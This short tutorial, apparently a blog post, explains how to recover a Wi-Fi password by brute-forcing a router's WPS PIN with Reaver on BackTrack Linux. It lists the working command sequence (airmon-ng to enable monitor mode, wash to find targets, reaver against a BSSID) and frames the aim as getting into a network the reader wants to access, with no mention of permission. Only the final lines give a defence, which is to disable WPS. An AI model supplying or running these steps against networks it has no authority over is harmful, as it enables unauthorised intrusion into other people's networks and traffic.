First, you will need an USB flash drive to install Linux BackTrack.
BackTrack is a standalone operating system which comes packed with a security suite containing tools for monitoring and security audit. In this case, we will use BackTrack to exploit vulnerabilities of a wireless network.
Reaver tool is by default installed in BackTrack and will help use gain the key, PIN and SSID of the wireless network we want to access. Reaver is exploiting a vulnerability found on most routers and access points featuring WPS (wireless protected setup).
How is the Wi-Fi password snatched?
By using a brute force method, Reaver will try various combinations to uncover the WPS pin. The vulnerability resides in the fact that Reaver can uncover the first 4 digits of the pin and then move on to the next set of 4. Since the router validates the first 4 digits first, Reaver can exploit the vulnerability and reduce brute forcing time
What commands do you use?
- airmon-ng to detect wireless cards
- airmon-ng start wlan0 or wlan1, depending on how many wireless cards are detected and on which one you are willing to use in monitoring mode.
- wash -i mon0 to detect wireless networks. If you get “Found packet with dab FCS, skipping…” error, try using wash -i mon0 –ignore-fcs
- reaver -i mon0 -b “name of BSSID” -d 0 -vv
Now you will have to wait between a few minutes and a few hours before the Wi-Fi password is uncovered.
How do you protect against this exploit?
It’s simple. Just deactivate WPS (it is called QSS on TP-Link routers). It is normally activated by default from factory so the router gets WPS certification.